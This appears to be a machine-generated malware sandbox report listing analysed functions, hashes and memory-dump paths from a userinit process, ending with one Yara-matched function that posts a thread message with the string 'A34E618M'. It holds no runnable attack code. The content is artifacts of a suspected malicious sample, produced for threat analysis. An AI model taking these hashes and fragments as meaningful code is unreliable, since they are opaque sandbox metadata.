                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction ID: ad76481d9f1f1d520d89e7e65acc29b84d6678d3f05844dabe1079dadcf688e0
                                                                • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction Fuzzy Hash: 14E04F362003147BD620EA59DC40FDB776CDFC6750F414015FA09AB140CA71B91587F5
                                                                Function 03774340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                • Instruction ID: 05fffe6009b48b8d4f6e07590d557887869c02cf906eeb2b929b9577fbe785b9
                                                                • Opcode Fuzzy Hash: b76752e9f5434cb179dfa54d6d85e33a41b1bca4687c96c98d643869f289830a
                                                                • Instruction Fuzzy Hash: A690023164580422A140B25848C4586400697E0311B95C021E0424568C8B148A565363
                                                                Function 03774650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a4bbb1f35bb45113d594037f9401d4297f15b2cdc2027e5a6c71013ac253bcd1
                                                                • Instruction ID: 6a0941fc36506329a2e89c99a29ee79a11ee048d0f31ec650e56343573138238
                                                                • Opcode Fuzzy Hash: a4bbb1f35bb45113d594037f9401d4297f15b2cdc2027e5a6c71013ac253bcd1
                                                                • Instruction Fuzzy Hash: 65900261641504525140B2584884446600697E13113D5C125A0554574C87188955926B
                                                                Function 03772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6b3cf9f508192e3513ef992869777860b2de241ba919cbf17fe7175a3706a11f
                                                                • Instruction ID: a3aad2bcd0e38a45d751b5b138e279c8a106b8958b6414968935ead586aa7d7b
                                                                • Opcode Fuzzy Hash: 6b3cf9f508192e3513ef992869777860b2de241ba919cbf17fe7175a3706a11f
                                                                • Instruction Fuzzy Hash: 5F900261242404135105B2584494656400B87E0311B95C031E10145A4DC62589916127
                                                                Function 03772BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a14e21fc8008e8aed94b2d53e987089e3f04d7a0c432c934bcd0e036290fe68b
                                                                • Instruction ID: 9a5925bce28e2386ef0b8278e1a22ee6bb631abbe33767e56e36bbb114696e12
                                                                • Opcode Fuzzy Hash: a14e21fc8008e8aed94b2d53e987089e3f04d7a0c432c934bcd0e036290fe68b
                                                                • Instruction Fuzzy Hash: 5D90023124140C12E180B258448468A000687D1311FD5C025A0025668DCB158B5977A3
                                                                Function 03772BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 7500c7b3512f2afbffc7407a1560330a76f4c4817d5a27f1c8a4ffbc687258ac
                                                                • Instruction ID: f220c0daf812becec8621aa1efd7a1ccd81fdff2a4de1131941ddb4091aac903
                                                                • Opcode Fuzzy Hash: 7500c7b3512f2afbffc7407a1560330a76f4c4817d5a27f1c8a4ffbc687258ac
                                                                • Instruction Fuzzy Hash: 3790023124544C52E140B2584484A86001687D0315F95C021A00646A8D97258E55B663
                                                                Function 03772BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 718ccf7e70ef4ee38a643a70ed4972010d729708ff227f697d49ead1718332c9
                                                                • Instruction ID: e5a1212d6694ca370ad98c13a48eb0bf217437f1dbc0a0d58f12e02b4e773847
                                                                • Opcode Fuzzy Hash: 718ccf7e70ef4ee38a643a70ed4972010d729708ff227f697d49ead1718332c9
                                                                • Instruction Fuzzy Hash: D690023164540C12E150B2584494786000687D0311F95C021A0024668D87558B5576A3
                                                                Function 03772AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: d29a484699121c308d442a2e5c4ad2368b7fc7121fa6670a17ca7b6293bc2a8f
                                                                • Instruction ID: ded197d3f9cba5d86920a68cc985eef0fb208fcd234255c53002b61a0c5a2150
                                                                • Opcode Fuzzy Hash: d29a484699121c308d442a2e5c4ad2368b7fc7121fa6670a17ca7b6293bc2a8f
                                                                • Instruction Fuzzy Hash: 2B900225261404121145F658068454B044697D63613D5C025F14165A4CC72189655323
                                                                Function 03772AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ce63914a5ccb7007c5aa190debe39b28dad9b63ef87979d579376e666cde2bcb
                                                                • Instruction ID: 18477756366390eb8bcfc9bff1bcd009380bd4abe4c24940c1a9464f8d616fa4
                                                                • Opcode Fuzzy Hash: ce63914a5ccb7007c5aa190debe39b28dad9b63ef87979d579376e666cde2bcb
                                                                • Instruction Fuzzy Hash: F5900435351404131105F75C07C45470047C7D53713D5C031F1015574CD731CD715133
                                                                Function 03772F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a93d7ff5dfcde7eaec789da5dd704bee97ab5c963ae74283f30227f0a087099c
                                                                • Instruction ID: 3b8e130769b1a55ab52ec7f359914fba229cf944ccbb4d3d7997522583e4a766
                                                                • Opcode Fuzzy Hash: a93d7ff5dfcde7eaec789da5dd704bee97ab5c963ae74283f30227f0a087099c
                                                                • Instruction Fuzzy Hash: 6C90026138140852E100B2584494B460006C7E1311F95C025E1064568D8719CD526127
                                                                Function 03772FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6344750bc5584d3abd0d18bea28701c1418635f1ebc76a4a0ff403d8b9b62758
                                                                • Instruction ID: 5f54a04f2e30911417cff9dbfb65684457abed8ecfad4234ba124c91a8224550
                                                                • Opcode Fuzzy Hash: 6344750bc5584d3abd0d18bea28701c1418635f1ebc76a4a0ff403d8b9b62758
                                                                • Instruction Fuzzy Hash: 12900221251C0452E200B6684C94B47000687D0313F95C125A0154568CCA1589615523
                                                                Function 03772FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f770f2acf3a64d57dac4534942823714aa702e74405310106a03862d22991b1b
                                                                • Instruction ID: 9f8b13a80150b355350e4a9037193b3fa5f03776fa3fcaf67abb99798707f23e
                                                                • Opcode Fuzzy Hash: f770f2acf3a64d57dac4534942823714aa702e74405310106a03862d22991b1b
                                                                • Instruction Fuzzy Hash: D1900221641404525140B26888C49464006ABE1321795C131A0998564D865989655667
                                                                Function 03772EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6d8dd45ff88646e9a641d5ed6b3a0c2dd00693d73719af8e355cd5c009434f0b
                                                                • Instruction ID: dd82c02494d3b1a3c3ae9c93b7638e10850e81d38f5588d672be4634cb5a26bc
                                                                • Opcode Fuzzy Hash: 6d8dd45ff88646e9a641d5ed6b3a0c2dd00693d73719af8e355cd5c009434f0b
                                                                • Instruction Fuzzy Hash: AC90026124180813E140B6584884647000687D0312F95C021A2064569E8B298D516137
                                                                Function 03772E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 560cbb35381cef340470360ff8cb9e54405a752404925cb9c1a3536010b64604
                                                                • Instruction ID: 3c6e6328f2957b0a7cdec0eb772fca3e1f6f158415ad49fce917347abdfdb011
                                                                • Opcode Fuzzy Hash: 560cbb35381cef340470360ff8cb9e54405a752404925cb9c1a3536010b64604
                                                                • Instruction Fuzzy Hash: 1090022164140912E101B2584484656000B87D0351FD5C032A1024569ECB258A92A133
                                                                Function 03772D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: dba549bc378ecfcdff6a7bf8adccafce8314b5bbdf759652b5746fd6d630c293
                                                                • Instruction ID: 9f8c10ad5de56274b347a8719ca2b4e432e14d5a73d59f13b9667694d895d047
                                                                • Opcode Fuzzy Hash: dba549bc378ecfcdff6a7bf8adccafce8314b5bbdf759652b5746fd6d630c293
                                                                • Instruction Fuzzy Hash: AE90022134140413E140B25854986464006D7E1311F95D021E0414568CDA1589565223
                                                                Function 03772D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c8428890eae5bbf2c19a0e7bbbb6f9e9052f11ecccd2b88ad67b16f739c021d4
                                                                • Instruction ID: 6aeb88f296ac03c9e7b94fbef8dab53ede78960a62f6895e4c34ed7e54c42e62
                                                                • Opcode Fuzzy Hash: c8428890eae5bbf2c19a0e7bbbb6f9e9052f11ecccd2b88ad67b16f739c021d4
                                                                • Instruction Fuzzy Hash: F390022925340412E180B258548864A000687D1312FD5D425A001556CCCA1589695323
                                                                Function 03772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                • Instruction ID: 9f6034c568eabfdaf0c2e47c60c6f708f4538fce838069e431de605fe0a14a09
                                                                • Opcode Fuzzy Hash: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                • Instruction Fuzzy Hash: C890023124140823E111B2584584747000A87D0351FD5C422A042456CD97568A52A123
                                                                Function 03772DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                • Instruction ID: de90223db0a197316014b1d3d92a172e49ee224e11891a55dbb6319160ee72dd
                                                                • Opcode Fuzzy Hash: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                • Instruction Fuzzy Hash: 28900221282445626545F2584484547400797E03517D5C022A1414964C86269956D623
                                                                Function 03772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                • Instruction ID: c179e1ba678b5ba94903426f59eb340adae52e224be21bedaaf7553577f7d5f1
                                                                • Opcode Fuzzy Hash: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                • Instruction Fuzzy Hash: 6A90023124148C12E110B258848478A000687D0311F99C421A442466CD879589917123
                                                                Function 03772C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
                                                                • Instruction ID: 81f0fea1dab6c1d052ee77b177fc65b5619418195afab6440ba213b2afe9f8a3
                                                                • Opcode Fuzzy Hash: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
                                                                • Instruction Fuzzy Hash: A490023124140C52E100B2584484B86000687E0311F95C026A0124668D8715C9517523
                                                                Function 03772CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                • Instruction ID: 5978dac7a7856e3ccb7f673c0fe2cecd6f7a663fc39f32d5ca1ecfae037b3200
                                                                • Opcode Fuzzy Hash: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                • Instruction Fuzzy Hash: 7F90023124140812E100B6985488686000687E0311F95D021A5024569EC76589916133
                                                                Function 037735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                • Instruction ID: 598a9f711bbc988c4d73ab27d2a4cfc57ad91d81525b01bafd9b60d0d55cf482
                                                                • Opcode Fuzzy Hash: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                • Instruction Fuzzy Hash: 3490023164550812E100B2584594746100687D0311FA5C421A042457CD87958A5165A3
                                                                Function 037739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                • Instruction ID: ddde1d1d811e797d6f2b2adc35cbecdd6d4019858da708dd10ce2287fdfcfc37
                                                                • Opcode Fuzzy Hash: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                • Instruction Fuzzy Hash: 5690022128545512E150B25C44846564006A7E0311F95C031A08145A8D865589556223
                                                                Function 030109E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 03010A67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
